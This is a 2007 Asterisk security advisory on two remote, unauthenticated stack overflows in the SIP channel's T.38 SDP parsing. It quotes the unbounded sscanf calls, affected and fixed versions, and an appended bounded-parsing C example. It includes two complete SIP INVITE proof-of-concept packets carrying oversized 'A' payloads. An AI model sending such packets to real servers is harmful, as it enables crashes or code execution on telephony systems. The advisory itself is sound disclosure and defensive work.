
ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code



>                Asterisk Project Security Advisory - ASA-2007-010
> 
>    +------------------------------------------------------------------------+
>    |      Product       | Asterisk                                          |
>    |--------------------+---------------------------------------------------|
>    |      Summary       | Two stack buffer overflows in SIP channel's T.38  |
>    |                    | SDP parsing code                                  |
>    |--------------------+---------------------------------------------------|
>    | Nature of Advisory | Exploitable Stack Buffer Overflow                 |
>    |--------------------+---------------------------------------------------|
>    |   Susceptibility   | Remote Unauthenticated Sessions                   |
>    |--------------------+---------------------------------------------------|
>    |      Severity      | Moderate                                          |
>    |--------------------+---------------------------------------------------|
>    |   Exploits Known   | No                                                |
>    |--------------------+---------------------------------------------------|
>    |    Reported On     | March 22, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |    Reported By     | Barrie Dempster, NGS Software,                    |
>    |                    | <barrie@xxxxxxxxxxxxxxx>                          |
>    |--------------------+---------------------------------------------------|
>    |     Posted On      | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Last Updated On   | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Advisory Contact  | kpfleming@xxxxxxxxxx                              |
>    +------------------------------------------------------------------------+
> 
> Description
> 
> Two closely related stack based buffer overflows exist in the SIP/SDP
> handler of Asterisk. The vulnerabilities are very similar but exist as
> two separate unsafe function calls. The T38FaxRateManagement and
> T38FaxUdpEC SDP parameters can be exploited remotely, leading to
> arbitrary code execution without authentication. In order for these
> overflows to occur, t38 fax over SIP must be enabled in sip.conf.
> Examples of SIP INVITE packets are shown below; however, these
> vulnerabilities can be triggered with a number of different SIP
> messages affecting calls received by Asterisk, or in response to calls
> made by Asterisk.
> 
> Remote Unauthenticated stack overflow in Asterisk SIP/SDP
> T38FaxRateManagement parameter
> 
> A remote unauthenticated stack overflow exists in the SIP/SDP handler of
> Asterisk. By sending a SIP packet with SDP data which includes an overly
> long T38 parameter it is possible to overflow a stack based buffer and
> execute arbitrary code.
> 
> The process_sdp function of chan_sip.c in Asterisk contains the
> following vulnerable call to sscanf.
> 
>     else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {
>         found = 1;
>         if (option_debug > 2)
>             ast_log(LOG_DEBUG, "RateMangement: %s\n", s);
>         if (!strcasecmp(s, "localTCF"))
>             peert38capability |= T38FAX_RATE_MANAGEMENT_LOCAL_TCF;
>         else if (!strcasecmp(s, "transferredTCF"))
>             peert38capability |= T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;
> 
> This attempts to read the "T38FaxRateManagement:" option from the SDP
> within a SIP packet and copy the succeeding string into "s". There are
> no checks on the length of this string and we can therefore write past
> the boundaries of the "s" variable, overwriting adjacent memory on the
> stack. "s" is defined earlier in this function as being a character
> array of only 256 bytes. The following example packet demonstrates an
> overflow of this parameter:
> 
>     INVITE sip:200@xxxxxxxxx SIP/2.0
>     Date: Wed, 21 Mar 2007 4:20:09 GMT
>     CSeq: 1 INVITE
>     Via: SIP/2.0/UDP 10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
>     User-Agent: NGS/2.0
>     From: "Barrie Dempster" <sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672
>     Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
>     To: <sip:200@localhost>
>     Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>
>     Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
>     Content-Type: application/sdp
>     Content-Length: 796
>     Max-Forwards: 70
> 
>     v=0
>     o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
>     s=-
>     c=IN IP4 127.0.0.1
>     t=0 0
>     m=image 5004 UDPTL t38
>     a=T38FaxVersion:0
>     a=T38MaxBitRate:14400
>     a=T38FaxMaxBuffer:1024
>     a=T38FaxMaxDatagram:238
>     a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     a=T38FaxUdpEC:t38UDPRedundancy
> 
> -------------------------------------------------
> 
> Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC
> parameter
> 
> A remote unauthenticated stack overflow exists in the SIP/SDP handler of
> Asterisk. By sending a SIP packet with SDP data which includes an overly
> long T38FaxUdpEC parameter it is possible to overflow a stack based
> buffer and execute arbitrary code.
> 
> The process_sdp function of chan_sip.c in Asterisk contains the
> following vulnerable call to sscanf.
> 
>     else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {
>         found = 1;
>         if (option_debug > 2)
>             ast_log(LOG_DEBUG, "UDP EC: %s\n", s);
>         if (!strcasecmp(s, "t38UDPRedundancy")) {
>             peert38capability |= T38FAX_UDP_EC_REDUNDANCY;
>             ast_udptl_set_error_correction_scheme(p->udptl,
>                 UDPTL_ERROR_CORRECTION_REDUNDANCY);
> 
> This attempts to read the "T38FaxUdpEC:" option from the SDP within a
> SIP packet and copy the succeeding string into "s". There are no checks
> on the length of this string and we can therefore write past the
> boundaries of the "s" variable, overwriting adjacent memory on the stack.
> "s" is defined earlier in this function as being a character array of
> only 256 bytes. The following example packet demonstrates an overflow of
> this parameter:
> 
>     INVITE sip:200@xxxxxxxxx SIP/2.0
>     Date: Wed, 21 Mar 2007 4:20:09 GMT
>     CSeq: 1 INVITE
>     Via: SIP/2.0/UDP 10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
>     User-Agent: NGS/2.0
>     From: "Barrie Dempster" <sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672
>     Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
>     To: <sip:200@localhost>
>     Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>
>     Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
>     Content-Type: application/sdp
>     Content-Length: 796
>     Max-Forwards: 70
> 
>     v=0
>     o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
>     s=-
>     c=IN IP4 127.0.0.1
>     t=0 0
>     m=image 5004 UDPTL t38
>     a=T38FaxVersion:0
>     a=T38MaxBitRate:14400
>     a=T38FaxMaxBuffer:1024
>     a=T38FaxMaxDatagram:238
>     a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> 
>    +------------------------------------------------------------------------+
>    | Resolution | T.38 support in the affected versions of Asterisk is not  |
>    |            | enabled by default, therefore the severity of this issue  |
>    |            | is 'moderate'.                                            |
>    |            |                                                           |
>    |            | Users who are using the default configuration with        |
>    |            | 't38_udptl' set to 'no' or an equivalent value are not    |
>    |            | susceptible to this vulnerability. Users who have set     |
>    |            | this configuration item to 'yes' or an equivalent value   |
>    |            | but are not actually using T.38 support can set it to     |
>    |            | 'no' to secure their systems against this vulnerability.  |
>    |            |                                                           |
>    |            | All other users are urged to upgrade to the appropriate   |
>    |            | version of their Asterisk product listed in the           |
>    |            | 'Corrected In' section below.                             |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                           Affected Versions                            |
>    |------------------------------------------------------------------------|
>    |           Product            |   Release   |                           |
>    |                              |   Series    |                           |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.0.x    | not affected; does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.2.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.4.x    | all releases prior to     |
>    |                              |             | 1.4.3                     |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    A.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    B.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |         AsteriskNOW          | pre-release | all releases prior to and |
>    |                              |             | including Beta 5          |
>    |------------------------------+-------------+---------------------------|
>    | Asterisk Appliance Developer |    0.x.x    | all releases prior to     |
>    |             Kit              |             | 0.4.0                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                              Corrected In                              |
>    |------------------------------------------------------------------------|
>    |      Product       |                      Release                      |
>    |--------------------+---------------------------------------------------|
>    |   Asterisk Open    |               1.4.3, available from               |
>    |       Source       |    ftp://ftp.digium.com/pub/telephony/asterisk    |
>    |--------------------+---------------------------------------------------|
>    |    AsteriskNOW     |            Beta 6, when available from            |
>    |                    | http://www.asterisknow.org; Beta 5 users can use  |
>    |                    |     'System Update' in the appliance control      |
>    |                    |   panel to update their version of AsteriskNOW    |
>    |--------------------+---------------------------------------------------|
>    | Asterisk Appliance |               0.4.0, available from               |
>    |   Developer Kit    |      ftp://ftp.digium.com/pub/telephony/aadk      |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |        Links         |                                                 |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Asterisk Project Security Advisories are posted at                     |
>    | http://www.asterisk.org/security.                                      |
>    |                                                                        |
>    | This document may be superseded by later versions; if so, the latest   |
>    | version will be posted at                                              |
>    | http://www.asterisk.org/files/ASA-2007-010.pdf.                        |
>    +------------------------------------------------------------------------+
> 
>               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
>   Permission is hereby granted to distribute and publish this advisory in its
>                            original, unaltered form.
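A bounded version of the two parses the advisory quotes, as an added example that is not Asterisk's code and does not claim to be the project's own fix: the sscanf field width is tied to the size of the destination buffer, and %n is used to refuse a value that would have been truncated rather than silently acting on it. Asterisk's identifier names are reused for readability; the flag bit values, the helper names and the 256-byte buffer size (taken from the advisory's description of "s") are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

/* Added example, not Asterisk's code. T38_BUF mirrors the 256-byte "s"
 * array the advisory describes; the capability bit values are assumed. */
#define T38_BUF 256
#define T38FAX_RATE_MANAGEMENT_LOCAL_TCF      (1 << 0)
#define T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF (1 << 1)
#define T38FAX_UDP_EC_REDUNDANCY              (1 << 2)

/* Outcome of reading one "<name>:<value>" T.38 attribute. */
enum t38_read { T38_TOO_LONG = -1, T38_ABSENT = 0, T38_OK = 1 };

/* Bounded replacement for `sscanf(a, "<name>:%s", s)`: the field width is
 * derived from the destination size, so sscanf never writes past `out` and
 * always NUL-terminates; %n records where the value ended so a truncated
 * value can be told apart from a complete one. */
enum t38_read read_t38_attr(const char *a, const char *name,
                            char *out, size_t outlen)
{
    char fmt[64];
    int consumed = -1;

    if (outlen < 2 || strlen(name) > 40)
        return T38_ABSENT;
    /* Builds e.g. "T38FaxRateManagement:%255s%n" for a 256-byte buffer. */
    snprintf(fmt, sizeof fmt, "%s:%%%zus%%n", name, outlen - 1);

    if (sscanf(a, fmt, out, &consumed) != 1)
        return T38_ABSENT;

    /* The byte after the consumed value must be end-of-string or whitespace;
     * anything else means the peer's value did not fit in the buffer. */
    if (consumed < 0 ||
        (a[consumed] != '\0' && !isspace((unsigned char)a[consumed])))
        return T38_TOO_LONG;
    return T38_OK;
}

/* Handles the two attributes the advisory covers. `a` is the text after
 * "a=" on one SDP line. Returns the capability bits recognised, 0 for any
 * other attribute or an unknown value, and -1 when an over-long value was
 * refused (the caller should reject the offer rather than act on it). */
int parse_t38_sdp_attr(const char *a)
{
    char s[T38_BUF];
    int caps = 0;
    enum t38_read r;

    if ((r = read_t38_attr(a, "T38FaxRateManagement", s, sizeof s)) != T38_ABSENT) {
        if (r == T38_TOO_LONG)
            return -1;
        if (!strcasecmp(s, "localTCF"))
            caps |= T38FAX_RATE_MANAGEMENT_LOCAL_TCF;
        else if (!strcasecmp(s, "transferredTCF"))
            caps |= T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;
    } else if ((r = read_t38_attr(a, "T38FaxUdpEC", s, sizeof s)) != T38_ABSENT) {
        if (r == T38_TOO_LONG)
            return -1;
        if (!strcasecmp(s, "t38UDPRedundancy"))
            caps |= T38FAX_UDP_EC_REDUNDANCY;
    }
    return caps;
}

/* Builds "<name>:" followed by n_a 'A' bytes (the shape of the advisory's
 * example packets) and runs it through the parser; -2 on allocation failure. */
int parse_padded_attr(const char *name, size_t n_a)
{
    size_t nlen = strlen(name);
    char *line = malloc(nlen + 1 + n_a + 1);
    int result;

    if (!line)
        return -2;
    memcpy(line, name, nlen);
    line[nlen] = ':';
    memset(line + nlen + 1, 'A', n_a);
    line[nlen + 1 + n_a] = '\0';
    result = parse_t38_sdp_attr(line);
    free(line);
    return result;
}
```

With this shape a 255-byte value still parses (and simply fails the strcasecmp checks), while the 564-byte values in the advisory's packets are refused before anything looks at `s`.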